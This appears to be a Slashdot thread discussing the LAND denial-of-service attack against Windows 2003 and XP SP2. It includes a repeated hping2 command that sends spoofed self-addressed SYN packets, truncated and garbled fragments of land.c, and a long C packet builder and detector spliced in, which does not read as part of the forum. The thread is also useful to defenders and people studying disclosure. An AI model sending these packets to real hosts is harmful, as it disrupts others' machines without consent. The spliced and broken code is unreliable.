Windows 2003 and XP SP2 Vulnerable To LAND Attack
An anonymous reader writes "Dejan Levaja, a Serbian security engineer, has discovered that nearly 8 years after the attack was first made public, Windows 2003 and Windows XP SP2 are in fact vulnerable to the historic LAND attack." Granted, you need to have the firewall turned off for this to work, but there's a whole lotta machines that don't have it turned on.
Re:Only win ? (Score:5, Informative)
What is the LAND attack? (Score:5, Informative)
So it's a way to either remotely lock up or reboot a target machine. I would assume (not having, you know, tried it or anything) that this includes most Windows-based webservers.
Re:News? (Score:5, Informative)
Two things of note: (Score:2, Informative)
"LAND attack:
Sending a TCP packet with the SYN flag set, with source and destination IP address and source and destination port equal to those of the destination machine, results in a 15-30 second DoS condition."
If I understand correctly, this means the vulnerable machine will attempt to synchronise a connection with itself?
I find this quote enlightening:
"Ethic:
Microsoft was informed 7 days ago (25.02.2005, GMT +1, local time), NO answer received, so I decided to share this info with security community. "
So the vulnerability was made public. So exploits are going to be made. However, if Microsoft, who claim to have shifted more focus to security issues, had even acknowledged this report, the vulnerability wouldn't have become public so soon without a patch.
Kinda worries you about the way computer security is handled, doesn't it?
Want to do your own testing? (Score:4, Informative)
hping2 aaa.bbb.ccc.ddd -s 135 -p 135 -S -a aaa.bbb.ccc.ddd
Obviously, replace aaa.bbb.ccc.ddd w/ the ip address of the workstation you'd like to test
MOD PARENT UP ! (Score:4, Informative)
BSDI 2.1 (K210-021,K210-022,K210-024) NOT vulnerable
BSDI 3.0 NOT vulnerable
Digital UNIX 4.0 NOT vulnerable
FreeBSD 2.2.2-RELEASE IS vulnerable
FreeBSD 2.2.5-RELEASE IS vulnerable
FreeBSD 2.2.5-STABLE IS vulnerable
FreeBSD 3.0-CURRENT IS vulnerable
HP-UX 10.20 IS vulnerable
IRIX 6.2 NOT vulnerable
Linux 2.0.30 NOT vulnerable
Linux 2.0.32 NOT vulnerable
MacOS 8.0 IS vulnerable (TCP/IP stack crashed)
NetBSD 1.2 IS vulnerable
NeXTSTEP 3.0 IS vulnerable
NeXTSTEP 3.1 IS vulnerable
Novell 4.11 NOT vulnerable
OpenBSD 2.1 IS vulnerable
OpenBSD 2.2 (Oct31) NOT vulnerable
SCO OpenServer 5.0.4 NOT vulnerable
Solaris 2.5.1 IS vulnerable (conflicting reports)
SunOS 4.1.4 IS vulnerable
Windows 95 (vanilla) IS vulnerable
Windows 95 + Winsock 2 + VIPUPD.EXE IS vulnerable
Re:I know it's been around, but...Linking to source (Score:5, Informative)
---snip---
bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->version=4;
ipheader->ihl=si
ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->id=htons(0xF1C);
ipheader->
ipheader->protocol=IP_TCP;
ipheader->sa
ipheader->daddr=sin.sin_
tcpheader->th_sport=sin.sin_port;
tcpheader->t
tcpheader->th_seq=htonl(0xF
tcpheader->th_flags=TH_SYN;
tcpheader->th_o
tcpheader->th_win=htons(2048);
bzero(&pseudoheader,12+sizeof(struct tcphdr));
pseudoheader.saddr.s_addr=sin.sin_addr
pseudoheader.daddr.s_addr=sin.sin_addr.s
pseudoheader.protocol=6;
pseudoheader.len
bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
---snip---
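The packet the advisory quote describes (a SYN whose source address and port are the target's own) and the pseudo-header checksum the snippet above computes, as an added standalone example. This is not the original land.c and not Levaja's code; it only builds the packet in a buffer and never sends it (sending needs a raw socket with IP_HDRINCL and root, and a host you have permission to test). It goes a little beyond the snippet: a generic SYN builder so a normal SYN can be compared against the LAND variant, a verifier for both checksums (RFC 1071 one's-complement sum, RFC 793 pseudo-header), and the check a border router or host firewall applies to drop such packets. The target 192.0.2.10:135 and the peer 192.0.2.20:4444 are constructed test values.

```c
/* Added example: build a LAND packet in memory, checksum it and detect it.
 * Not the original land.c. Target 192.0.2.10:135 is a constructed value. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <netinet/in.h>         /* IPPROTO_TCP */
#include <arpa/inet.h>          /* htons, htonl */

#define TH_SYN 0x02
#define PKT_LEN 40              /* 20-byte IPv4 header + 20-byte TCP header */

struct ip_hdr {                 /* IPv4 header, no options */
    uint8_t  ver_ihl, tos;
    uint16_t tot_len, id, frag_off;
    uint8_t  ttl, protocol;
    uint16_t check;
    uint32_t saddr, daddr;
} __attribute__((packed));

struct tcp_hdr {                /* TCP header, no options */
    uint16_t sport, dport;
    uint32_t seq, ack;
    uint8_t  doff, flags;       /* data offset (words) in the high nibble */
    uint16_t win, check, urg;
} __attribute__((packed));

struct pseudo_hdr {             /* RFC 793 pseudo-header for the TCP checksum */
    uint32_t saddr, daddr;
    uint8_t  zero, protocol;
    uint16_t tcp_len;
} __attribute__((packed));

/* RFC 1071 Internet checksum; returns the value to store in the header.
 * Over a header that already contains its checksum it returns 0. */
static uint16_t in_cksum(const void *data, size_t len) {
    const uint8_t *p = data;
    uint32_t sum = 0;
    for (; len > 1; len -= 2, p += 2) sum += (uint32_t)p[0] << 8 | p[1];
    if (len) sum += (uint32_t)p[0] << 8;                  /* odd trailing byte */
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16); /* fold carries */
    return htons((uint16_t)~sum);
}

/* Checksum over pseudo-header + TCP header (no payload, as in a bare SYN). */
static uint16_t tcp_cksum(const struct ip_hdr *ip, const struct tcp_hdr *tcp) {
    struct { struct pseudo_hdr ph; struct tcp_hdr tcp; } __attribute__((packed)) ps;
    ps.ph.saddr = ip->saddr;  ps.ph.daddr = ip->daddr;
    ps.ph.zero = 0;  ps.ph.protocol = IPPROTO_TCP;
    ps.ph.tcp_len = htons(sizeof *tcp);
    memcpy(&ps.tcp, tcp, sizeof *tcp);
    return in_cksum(&ps, sizeof ps);
}

/* Build a bare IPv4/TCP SYN into buf (>= PKT_LEN bytes). Addresses are in
 * network byte order, ports in host order. Returns bytes written. */
size_t build_syn(uint8_t *buf, uint32_t saddr, uint16_t sport,
                 uint32_t daddr, uint16_t dport) {
    struct ip_hdr  *ip  = (struct ip_hdr *)buf;
    struct tcp_hdr *tcp = (struct tcp_hdr *)(buf + sizeof *ip);
    memset(buf, 0, PKT_LEN);
    ip->ver_ihl = 0x45;  ip->tot_len = htons(PKT_LEN);  ip->id = htons(0xF1C);
    ip->ttl = 255;  ip->protocol = IPPROTO_TCP;
    ip->saddr = saddr;  ip->daddr = daddr;
    tcp->sport = htons(sport);  tcp->dport = htons(dport);
    tcp->seq = htonl(0xF1C);  tcp->doff = (uint8_t)((sizeof *tcp / 4) << 4);
    tcp->flags = TH_SYN;  tcp->win = htons(2048);
    tcp->check = tcp_cksum(ip, tcp);   /* TCP first; the IP checksum covers only the IP header */
    ip->check  = in_cksum(ip, sizeof *ip);
    return PKT_LEN;
}

/* The LAND variant: source address and port equal the target's own. */
size_t build_land(uint8_t *buf, uint32_t target, uint16_t port) {
    return build_syn(buf, target, port, target, port);
}

/* 1 if both the IP header checksum and the TCP checksum verify (bare SYN only). */
int checksums_valid(const uint8_t *pkt, size_t len) {
    const struct ip_hdr  *ip  = (const struct ip_hdr *)pkt;
    const struct tcp_hdr *tcp = (const struct tcp_hdr *)(pkt + sizeof *ip);
    if (len != PKT_LEN) return 0;
    return in_cksum(ip, sizeof *ip) == 0 && tcp_cksum(ip, tcp) == 0;
}

/* The filter rule a router or host firewall applies: a TCP SYN whose source
 * address and port equal its destination address and port. Walks the IHL so
 * IP options cannot push the TCP header out from under the check. */
int is_land_packet(const uint8_t *pkt, size_t len) {
    const struct ip_hdr  *ip = (const struct ip_hdr *)pkt;
    const struct tcp_hdr *tcp;
    size_t ihl;
    if (len < sizeof *ip || (ip->ver_ihl >> 4) != 4) return 0;
    ihl = (size_t)(ip->ver_ihl & 0x0f) * 4;
    if (ihl < sizeof *ip || ip->protocol != IPPROTO_TCP || len < ihl + sizeof *tcp) return 0;
    tcp = (const struct tcp_hdr *)(pkt + ihl);
    return ip->saddr == ip->daddr && tcp->sport == tcp->dport && (tcp->flags & TH_SYN) != 0;
}

static uint32_t ip4(int a, int b, int c, int d) {   /* dotted quad -> network order */
    return htonl((uint32_t)a << 24 | (uint32_t)b << 16 | (uint32_t)c << 8 | (uint32_t)d);
}

int main(void) {
    uint8_t pkt[PKT_LEN];
    size_t i, n = build_land(pkt, ip4(192, 0, 2, 10), 135);   /* constructed target */
    for (i = 0; i < n; i++) printf("%02x%s", pkt[i], (i % 16 == 15) ? "\n" : " ");
    printf("\nchecksums valid: %d, LAND: %d\n", checksums_valid(pkt, n), is_land_packet(pkt, n));
    n = build_syn(pkt, ip4(192, 0, 2, 20), 4444, ip4(192, 0, 2, 10), 135);
    printf("normal SYN flagged as LAND: %d\n", is_land_packet(pkt, n));
    return 0;
}
```

The checksum routine sums big-endian 16-bit words and writes the complement back with htons, so it gives the same bytes on little- and big-endian hosts; the TCP checksum has to be computed before the IP one only because the packed struct is shared, the IP checksum never covers the TCP header. The detector deliberately checks the address/port equality rather than anything Windows-specific, which is the same rule that makes most routers drop these packets on the way in.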
At least Windows NT is supposedly patched. (Score:5, Informative)
Explanation of LAND attack (Score:3, Informative)
Exploit (Score:1, Informative)
Re:Can anyone confirm? (Score:2, Informative)
For up to 30 seconds after the attack, I can move the mouse, but cannot click on anything.
All network activity stops during that time also.
Re:Can anyone confirm? (Score:4, Informative)
A test listed in an above comment of mine worked for my box. DL hping2 and try:
hping2 aaa.bbb.ccc.ddd -s 135 -p 135 -S -a aaa.bbb.ccc.ddd
Obviously, replace aaa.bbb.ccc.ddd w/ the ip address of the workstation you'd like to test
Re:What kind of software dev process do MS use? (Score:4, Informative)
exploit (Score:5, Informative)
Unfortunately the b0rked Slashdot lameness filter won't allow code to be posted even when 'post as code' is selected :?
Re:wow (Score:2, Informative)
Turn off the firewall? (Score:4, Informative)
OK, so what you're saying is that in order for XP to be vulnerable, it must be directly connected to the Internet, the user must specifically have disabled the firewall, and no intermediate firewall must be present.
At what point do we cease blaming Microsoft for stupid user tricks? I mean, Microsoft has freely given SP2 to anyone who wants it. Pretty soon it will be a mandatory download from WindowsUpdate. People bitched and moaned for years that Microsoft didn't do enough for security and didn't default to having updates apply automatically. But when Microsoft finally does improve security (with a better firewall) and tries to turn it all on by default, everyone griped. Damned if you do...
Look, if a Windows zealot took something like Fedora, turned on a bunch of services, turned off the firewall, and then griped because his box got hacked, Slashdotters everywhere would be screaming that this guy was a fool, that Linux security is great when it's not sabotaged by an idiot at the keyboard. And they'd be right. But when an attack requires that a Windows user actively subvert the very security measures Microsoft's put in place to protect him, everybody blames Microsoft. Nope, no bias to see here, citizens, please move along.
Ho hum (Score:3, Informative)
Re:Can anyone confirm? (Score:1, Informative)
Re:Want to do your own testing? (Score:1, Informative)
[send_ip]sendto: 10004
I have no idea whether it works or not, because I've never used this before.
Re:Only win ? (Score:5, Informative)
1st: The checksum code is always off by 3 in that file. Subtract 3 from the value before you take the complement and it'll be right. (this is a kludge, I haven't taken the time to actually figure out why it's wrong yet)
2nd: It causes 100% CPU usage on a WinXP SP2 box for about 3 seconds for each packet sent!!!
3rd: It can be blocked (and probably IS blocked) by most routers since the source and destination addresses are the same.
I got permission to send one of these packets to my friend's Win2003 box and as far as we can tell, it didn't do anything. I don't know if the packet is getting through though.
4th: Also, I retested the Mac, and again, the malformed packet did nothing.
Re:UNLABELED too. (Score:1, Informative)
If you can't think of 100 good reasons why a security professional or curious sysadmin would want a copy of this code, which, I'll note, has been around in this form for almost 8 years (to the point where it won't even COMPILE on a modern system), then you should put your computer back in its box and ring UPS to get it shipped back to the manufacturer, because you are too stupid to own it.
To elaborate, because you're obviously not so quick on the uptake; 'there is nothing inherently wrong with possessing a tool.' To elaborate further, this snippet of code can be used to verify that any vendor-supplied patch does, in fact, do what it says, amongst other things.
Think before spouting your mouth off. Your post espouses all of the bad ideas behind laws such as the DMCA. With people like you doing the thinking, is it little wonder that such laws get passed?